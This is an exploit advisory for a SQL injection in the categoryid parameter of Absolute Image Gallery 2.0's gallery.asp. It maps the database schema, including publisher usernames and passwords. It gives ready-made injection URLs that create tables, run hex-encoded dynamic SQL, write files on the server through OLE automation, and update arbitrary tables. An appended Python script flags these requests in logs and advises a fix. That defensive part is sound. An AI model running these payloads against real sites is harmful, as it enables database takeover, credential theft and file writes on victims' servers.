Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit

Type             : SQL Injection
Release Date     : {2007-03-15}
Product / Vendor : Absolute Image Gallery
                   http://www.xigla.com/absoluteig/

Bug : http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-

--------------------------------------------------------------------------------
Script Table/Column Name :
--------------------------------------------------------------------------------
Table Name : articlefiles
Columns    : fileid, filetitle, filename, articleid, filetype, filecomment,
             urlfile
--------------------------------------------------------------------------------
Table Name : articles
Columns    : articleid, posted, lastupdate, headline, headlinedate, startdate,
             enddate, source, summary, articleurl, article, status, autoformat,
             publisherid, clicks, editor, relatedid
--------------------------------------------------------------------------------
Table Name : iArticlesZones
Columns    : articleid, zoneid
--------------------------------------------------------------------------------
Table Name : plugins
Columns    : pluginid, pplname, pplfile, ppldescription
--------------------------------------------------------------------------------
Table Name : PPL1reviews
Columns    : reviewid, articleid, name, reviewdate, review, comments,
             isannonymous
--------------------------------------------------------------------------------
Table Name : publishers
Columns    : publisherid, name, username, password, email, additional, plevel
--------------------------------------------------------------------------------
Table Name : publisherszones
Columns    : publisherid, zoneid
--------------------------------------------------------------------------------
Table Name : xlaAIGcategories
Columns    : categoryid, catname, catdesc, supercatid, lastupdate, catpath,
             images, allowupload
--------------------------------------------------------------------------------
Table Name : xlaAIGimages
Columns    : imageid, imagename, imagedesc, imagefile, imagedate, imagesize,
             totalrating, totalreviews, hits, categoryid, status, uploadedby,
             additionalinfo, embedhtml, keywords, copyright, credit, source,
             datecreated, email, infourl
--------------------------------------------------------------------------------
Table Name : xlaAIGpostcards
Columns    : dateposted, postcardid, imageid, bgcolor, bordercolor, fonttype,
             fontcolor, recipientname, recipientemail, greeting, bgsound,
             sendername, senderemail, sendermsg
--------------------------------------------------------------------------------
Table Name : zones
Columns    : zonename, description, template, articlespz, zonefont, fontsize,
             fontcolor, showsource, showsummary, showdates, showtn, textalign,
             displayhoriz, cellcolor, targetframe
--------------------------------------------------------------------------------
MSSQL CMD Injection Exploit (For DBO Users) :

Absolute Image Gallery MSSQL CMD Injection Exploit

Note : For DBO Users

Example :


Command Exec :   Search Board    

UniquE-Key{UniquE-Cracker}
UniquE@UniquE-Key.ORG
http://UniquE-Key.ORG
--------------------------------------------------------------------------------
Code Injection(For DBO Users) :

Add Table :

http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);--

ASCII Code Add Database :

http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F373737287478742C6964292076616C7565732827272C3129+exec(@q);--

Code Injection :

http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id+=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripting.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+out,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;--

--------------------------------------------------------------------------------
UPDATE(ALL users) :

http://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE table SET colon = 'x';--

--------------------------------------------------------------------------------
Tested     : Absolute Image Gallery 2.0
Vulnerable : Absolute Image Gallery 2.0

Author : UniquE-Key{UniquE-Cracker}
         UniquE(at)UniquE-Key.Org
         http://www.UniquE-Key.Org
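
Detection side of the requests listed above, as an added example that is not part of the original advisory or the vendor's code: a log check that flags gallery.asp requests whose categoryid is not a plain integer and names the SQL indicators it carries. The function names, the rule that a valid categoryid is a short positive integer, and the sample URLs are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: a legitimate categoryid is a short positive integer.
VALID_ID = re.compile(r"\d{1,10}")

# Indicator patterns modelled on the request shapes listed in the advisory.
INDICATORS = {
    "stacked_statement": re.compile(r";"),
    "sql_comment": re.compile(r"--"),
    "dynamic_exec": re.compile(r"\b(exec|declare)\b", re.I),
    "ole_automation": re.compile(r"\bsp_oa(create|method)\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{8,}", re.I),
    "ddl_or_dml": re.compile(
        r"\b(create\s+table|insert\s+into|update\s+\S+\s+set)\b", re.I),
}

def query_values(query, name):
    """Decoded values of one parameter; split on '&' only so ';' stays in the value."""
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key).lower() == name:
            values.append(unquote_plus(value))
    return values

def check_request(url):
    """Return the sorted indicator names hit by categoryid in a gallery.asp request."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/gallery.asp"):
        return []
    hits = set()
    for value in query_values(parts.query, "categoryid"):
        if VALID_ID.fullmatch(value):
            continue  # plain integer: nothing to report
        hits.add("non_numeric_categoryid")
        hits.update(n for n, rx in INDICATORS.items() if rx.search(value))
    return sorted(hits)

# Constructed sample requests (not real log data).
SAMPLES = [
    "/script/gallery.asp?action=viewimage&categoryid=12",
    "/script/gallery.asp?action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);--",
    "/script/gallery.asp?action=viewimage&categoryid=-1%20UPDATE%20t%20SET%20c%20=%20'x';--",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(check_request(url) or "ok", url)
```

A check like this is a backstop for log review; the fix belongs in gallery.asp (convert categoryid to an integer or bind it as a query parameter) and in running the application under a database login that is not dbo.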